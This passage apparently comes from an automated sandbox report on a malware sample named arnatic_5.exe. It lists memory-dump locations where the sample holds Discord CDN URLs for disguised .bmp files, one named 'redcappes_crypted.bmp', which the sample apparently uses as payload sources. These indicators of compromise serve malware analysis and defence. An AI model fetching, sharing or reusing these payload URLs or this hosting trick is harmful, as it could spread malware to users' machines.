00000013.00000003.443044019.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406761614.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406228178.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.438103128.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421539113.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405599011.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.431906507.0000000003F8A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931269844253442058/LeGXxX6.bmp
Source: arnatic_5.exe, 00000013.00000003.415818417.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421224278.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406228178.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405599011.0000000003F39000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931269844253442058/LeGXxX6.bmp1638Z0
Source: arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931269844253442058/LeGXxX6.bmpC:
Source: arnatic_5.exe, 00000013.00000003.431944384.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406082315.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489168410.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426514646.0000000003F8A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435125355.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429303777.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.416417846.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426562167.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443044019.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406761614.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.438103128.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421539113.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.431906507.0000000003F8A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931269844253442058/LeGXxX6.bmpmp
Source: arnatic_5.exe, 00000013.00000003.443299508.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422120188.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404277078.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435620835.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481278032.0000000003EDB000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433191051.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417346885.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422671939.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480638589.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445072716.00000000064C0000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp
Source: arnatic_5.exe, 00000013.00000003.451469784.00000000064C0000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp$
Source: arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmpC:
Source: arnatic_5.exe, 00000013.00000002.488771629.0000000003EDB000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481278032.0000000003EDB000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmpHQ;
Source: arnatic_5.exe, 00000013.00000003.451469784.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429864201.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441257967.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432262657.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427009899.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428067710.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443299508.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422120188.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404277078.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435620835.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433191051.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417346885.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422671939.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445072716.00000000064C0000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmpa
Source: arnatic_5.exe, 00000013.00000002.488771629.0000000003EDB000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481278032.0000000003EDB000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmphP
Source: arnatic_5.exe, 00000013.00000002.488771629.0000000003EDB000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481278032.0000000003EDB000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmptPo
Source: arnatic_5.exe, 00000013.00000003.431944384.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.415818417.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421224278.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429303777.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406228178.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488951397.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405599011.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.431906507.0000000003F8A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931469914336821298/softer1401.bmp
Source: arnatic_5.exe, 00000013.00000003.431944384.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429303777.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.431906507.0000000003F8A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931469914336821298/softer1401.bmpB8A2D94-0
Source: arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931469914336821298/softer1401.bmpC:
Source: arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931469914336821298/softer1401.bmpU
Source: arnatic_5.exe, 00000013.00000003.440890233.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.451469784.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487556382.0000000000B31000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481392115.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429864201.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456916586.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441257967.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432262657.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427009899.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428067710.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443299508.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422120188.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404277078.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435620835.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433191051.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417346885.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422671939.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445072716.00000000064C0000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931474583054352464/newt.bmp
Source: arnatic_5.exe, 00000013.00000003.440890233.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487556382.0000000000B31000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481392115.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931474583054352464/newt.bmp1
Source: arnatic_5.exe, 00000013.00000003.417346885.00000000064C0000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931474583054352464/newt.bmp=
Source: arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931474583054352464/newt.bmpC:
Source: arnatic_5.exe, 00000013.00000002.489168410.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426514646.0000000003F8A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.415818417.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421224278.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426562167.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443044019.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406228178.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488951397.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405599011.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931475805228371968/1234_1401.bmp
Source: arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931475805228371968/1234_1401.bmp%
Source: arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931475805228371968/1234_1401.bmp-
Source: arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931475805228371968/1234_1401.bmp5
Source: arnatic_5.exe, 00000013.00000003.426514646.0000000003F8A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426562167.0000000003F9A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931475805228371968/1234_1401.bmpB8A2D94-0A
Source: arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931475805228371968/1234_1401.bmpC:
Source: arnatic_5.exe, 00000013.00000002.489168410.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443044019.0000000003F9A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931475805228371968/1234_1401.bmpJ
Source: arnatic_5.exe, 00000013.00000003.415818417.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421224278.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406228178.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488951397.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405599011.0000000003F39000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931475805228371968/1234_1401.bmpurity.
Source: arnatic_5.exe, 00000013.00000003.431944384.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406082315.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489168410.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426514646.0000000003F8A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435125355.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429303777.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.416417846.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426562167.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443044019.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406761614.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.438103128.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421539113.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.431906507.0000000003F8A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931494519592075284/27f_1401.bmp
Source: arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931494519592075284/27f_1401.bmpC:
Source: arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931494519592075284/27f_1401.bmpM
Source: arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931494519592075284/27f_1401.bmpMozilla/5.0
Source: arnatic_5.exe, 00000013.00000003.440987271.0000000000B49000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.431944384.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406082315.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426514646.0000000003F8A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435125355.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440924023.0000000000B36000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429303777.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488771629.0000000003EDB000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487645700.0000000000B49000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.416417846.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426562167.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443044019.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406761614.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481278032.0000000003EDB000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.438103128.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481455180.0000000000B49000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421539113.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.431906507.0000000003F8A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444387304.0000000000B49000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931559821109493760/redcappes_crypted.bmp
Source: arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931559821109493760/redcappes_crypted.bmpC:
Source: arnatic_5.exe, 00000013.00000002.488771629.0000000003EDB000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481278032.0000000003EDB000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931559821109493760/redcappes_crypted.bmpe
Source: arnatic_5.exe, 00000013.00000002.488771629.0000000003EDB000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481278032.0000000003EDB000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931559821109493760/redcappes_crypted.bmpid
Source: arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.415818417.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444466466.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421224278.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441051678.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481499097.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487716090.0000000000B57000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406228178.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, 